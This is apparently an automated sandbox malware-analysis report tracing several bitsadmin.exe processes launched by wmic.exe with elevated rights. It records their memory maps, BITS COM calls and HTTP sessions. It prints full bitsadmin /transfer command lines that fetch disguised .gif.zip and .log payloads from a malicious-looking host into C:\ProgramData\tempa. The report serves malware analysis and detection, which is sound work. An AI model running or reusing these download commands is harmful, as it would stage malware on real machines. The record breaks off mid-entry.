OS Process Information

»

Information	Value
PID	0xd18
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x D1C 0x D40 0x D44 0x D48 0x D4C

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x00187fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000190000	0x00190000	0x00196fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001a0000	0x001a0000	0x001a1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x001b0000	0x001b0fff	Memory Mapped File	rw	-
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	rw	-
private_0x00000000001d0000	0x001d0000	0x0020ffff	Private Memory	rw	-
pagefile_0x0000000000210000	0x00210000	0x00310fff	Pagefile Backed Memory	r	-
private_0x0000000000320000	0x00320000	0x00320fff	Private Memory	rw	-
pagefile_0x0000000000330000	0x00330000	0x00330fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000340000	0x00340000	0x00340fff	Pagefile Backed Memory	r	-
private_0x0000000000360000	0x00360000	0x0045ffff	Private Memory	rw	-
rpcss.dll	0x00460000	0x004bbfff	Memory Mapped File	r	-
private_0x0000000000460000	0x00460000	0x004fffff	Private Memory	rw	-
rsaenh.dll	0x00460000	0x0049bfff	Memory Mapped File	r	-
private_0x0000000000460000	0x00460000	0x0049ffff	Private Memory	rw	-
private_0x00000000004c0000	0x004c0000	0x004fffff	Private Memory	rw	-
pagefile_0x0000000000500000	0x00500000	0x005defff	Pagefile Backed Memory	r	-
private_0x0000000000640000	0x00640000	0x0064ffff	Private Memory	rw	-
private_0x0000000000730000	0x00730000	0x0076ffff	Private Memory	rw	-
private_0x0000000000790000	0x00790000	0x007cffff	Private Memory	rw	-
private_0x0000000000800000	0x00800000	0x0083ffff	Private Memory	rw	-
bitsadmin.exe	0x009e0000	0x00a23fff	Memory Mapped File	rwx	-
pagefile_0x0000000000a30000	0x00a30000	0x0162ffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01630000	0x018fefff	Memory Mapped File	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd6000	0x7ffd6000	0x7ffd6fff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxa.gif.zip?747193115, filename = C:\ProgramData\tempa\marxvxinhhmxa.gif	1	Fn

File (86)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	15	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	10	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	24	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0x9e0000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (11)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	3	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:01 (UTC)	6	Fn
Get Time	type = Ticks, time = 131696	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	397 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	397
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmxa.gif.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxa.gif.zip?747193115	1	Fn

Process #17: bitsadmin.exe

107

4

»

Information	Value
ID	#17
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxb.gif.zip?93543106 C:\ProgramData\tempa\marxvxinhhmxb.gif
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:13, Reason: Child Process
Unmonitor	End Time: 00:01:16, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0xd74
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x D78 0x D8C 0x D90 0x D94 0x D98

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x0006ffff	Private Memory	rw	-
pagefile_0x0000000000070000	0x00070000	0x00073fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000080000	0x00080000	0x00080fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000090000	0x00090000	0x00096fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000a0000	0x000a0000	0x000a1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x000b0000	0x000b0fff	Memory Mapped File	rw	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rw	-
private_0x00000000000e0000	0x000e0000	0x001dffff	Private Memory	rw	-
locale.nls	0x001e0000	0x00246fff	Memory Mapped File	r	-
pagefile_0x0000000000250000	0x00250000	0x00317fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000320000	0x00320000	0x00320fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000330000	0x00330000	0x00330fff	Pagefile Backed Memory	r	-
private_0x0000000000370000	0x00370000	0x0037ffff	Private Memory	rw	-
pagefile_0x0000000000380000	0x00380000	0x00480fff	Pagefile Backed Memory	r	-
rpcss.dll	0x00490000	0x004ebfff	Memory Mapped File	r	-
private_0x0000000000490000	0x00490000	0x0063ffff	Private Memory	rw	-
pagefile_0x0000000000490000	0x00490000	0x0056efff	Pagefile Backed Memory	r	-
rsaenh.dll	0x00570000	0x005abfff	Memory Mapped File	r	-
private_0x0000000000600000	0x00600000	0x0063ffff	Private Memory	rw	-
private_0x0000000000640000	0x00640000	0x0067ffff	Private Memory	rw	-
private_0x00000000006a0000	0x006a0000	0x006dffff	Private Memory	rw	-
private_0x0000000000720000	0x00720000	0x0075ffff	Private Memory	rw	-
private_0x00000000007c0000	0x007c0000	0x007fffff	Private Memory	rw	-
bitsadmin.exe	0x00a10000	0x00a53fff	Memory Mapped File	rwx	-
pagefile_0x0000000000a60000	0x00a60000	0x0165ffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01660000	0x0192efff	Memory Mapped File	r	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd5000	0x7ffd5000	0x7ffd5fff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxb.gif.zip?93543106, filename = C:\ProgramData\tempa\marxvxinhhmxb.gif	1	Fn

File (88)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	15	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	10	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	5	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	23	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 17	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 22	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 11	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 16	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 9	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0xa10000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (12)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	4	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:02 (UTC)	6	Fn
Get Time	type = Ticks, time = 132554	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	396 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	396
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/marxvxinhhmxb.gif.zip	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmxb.gif.zip?93543106	1	Fn

Process #18: bitsadmin.exe

73

4

»

Information	Value
ID	#18
File Name	c:\windows\system32\bitsadmin.exe
Command Line	"C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/r1.log C:\ProgramData\tempa\r1.log
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:15, Reason: Child Process
Unmonitor	End Time: 00:01:16, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

»

Information	Value
PID	0xda4
Parent PID	0xa98 (c:\windows\system32\wbem\wmic.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x DA8 0x DBC 0x DC0 0x DC4 0x DC8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	rw	-
bitsadmin.exe.mui	0x000e0000	0x000e0fff	Memory Mapped File	rw	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	rw	-
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	rw	-
pagefile_0x0000000000110000	0x00110000	0x00110fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000120000	0x00120000	0x00120fff	Pagefile Backed Memory	r	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	rw	-
rpcss.dll	0x00170000	0x001cbfff	Memory Mapped File	r	-
rsaenh.dll	0x00170000	0x001abfff	Memory Mapped File	r	-
private_0x00000000001e0000	0x001e0000	0x001effff	Private Memory	rw	-
private_0x0000000000200000	0x00200000	0x002fffff	Private Memory	rw	-
pagefile_0x0000000000300000	0x00300000	0x003c7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003d0000	0x003d0000	0x004d0fff	Pagefile Backed Memory	r	-
private_0x00000000004e0000	0x004e0000	0x0067ffff	Private Memory	rw	-
pagefile_0x00000000004e0000	0x004e0000	0x005befff	Pagefile Backed Memory	r	-
private_0x0000000000640000	0x00640000	0x0067ffff	Private Memory	rw	-
private_0x00000000006b0000	0x006b0000	0x006effff	Private Memory	rw	-
private_0x0000000000700000	0x00700000	0x0073ffff	Private Memory	rw	-
private_0x0000000000750000	0x00750000	0x0078ffff	Private Memory	rw	-
sortdefault.nls	0x00790000	0x00a5efff	Memory Mapped File	r	-
bitsadmin.exe	0x00a80000	0x00ac3fff	Memory Mapped File	rwx	-
pagefile_0x0000000000ad0000	0x00ad0000	0x016cffff	Pagefile Backed Memory	r	-
private_0x00000000017a0000	0x017a0000	0x017dffff	Private Memory	rw	-
qmgrprxy.dll	0x6f8b0000	0x6f8b8fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
rsaenh.dll	0x748e0000	0x7491afff	Memory Mapped File	rwx	-
cryptsp.dll	0x74b40000	0x74b55fff	Memory Mapped File	rwx	-
cryptbase.dll	0x74fc0000	0x74fcbfff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x75060000	0x7506dfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shell32.dll	0x75c70000	0x768b9fff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
clbcatq.dll	0x770c0000	0x77142fff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	rw	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-

Host Behavior

COM (4)

»

Operation	Class	Interface	Additional Information	Count	Logfile
Create	BackgroundCopyManager	IBackgroundCopyManager	cls_context = CLSCTX_LOCAL_SERVER	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyManager	method_name = CreateJob, display_name = msd5, new_interface = IBackgroundCopyJob	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = SetPriority, priority = BG_JOB_PRIORITY_FOREGROUND	1	Fn
Execute	BackgroundCopyManager	IBackgroundCopyJob	method_name = AddFile, url = http://xbr6lge984320911.notafiscal05.com:25067/04/r1.log, filename = C:\ProgramData\tempa\r1.log	1	Fn

File (58)

»

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn
Open	STD_INPUT_HANDLE	-	5	Fn
Write	STD_OUTPUT_HANDLE	size = 2	4	Fn Data
Write	STD_OUTPUT_HANDLE	size = 36	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 30	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 41	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 94	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 88	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 10	9	Fn Data
Write	STD_OUTPUT_HANDLE	size = 5	6	Fn Data
Write	STD_OUTPUT_HANDLE	size = 7	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 8	14	Fn Data
Write	STD_OUTPUT_HANDLE	size = 12	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 13	3	Fn Data
Write	STD_OUTPUT_HANDLE	size = 15	2	Fn Data
Write	STD_OUTPUT_HANDLE	size = 14	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 20	1	Fn Data

Module (5)

»

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\system32\bitsadmin.exe	base_address = 0xa80000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	2	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapSetInformation, address_out = 0x753c4157	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetThreadUILanguage, address_out = 0x753c24c2	1	Fn

System (8)

»

Operation	Additional Information	Count	Logfile
Sleep	duration = -1 (infinite)	2	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:03 (UTC)	3	Fn
Get Time	type = Ticks, time = 134238	1	Fn
Get Time	type = System Time, time = 2018-10-22 05:27:04 (UTC)	1	Fn

Network Behavior

HTTP Sessions (1)

»

Information	Value
Total Data Sent	372 bytes
Total Data Received	0 bytes
Contacted Host Count	1
Contacted Hosts	xbr6lge984320911.notafiscal05.com

HTTP Session #1

»

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)
Server Name	xbr6lge984320911.notafiscal05.com
Server Port	80
Data Sent	372
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = xbr6lge984320911.notafiscal05.com, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /04/r1.log	1	Fn
Send HTTP Request	url = http://xbr6lge984320911.notafiscal05.com:25067/04/r1.log	1	Fn

Process #19: bitsadmin.exe

107

4

»

Information	Value
ID	#19
File Name	c:\windows\system32\bitsadmin.exe
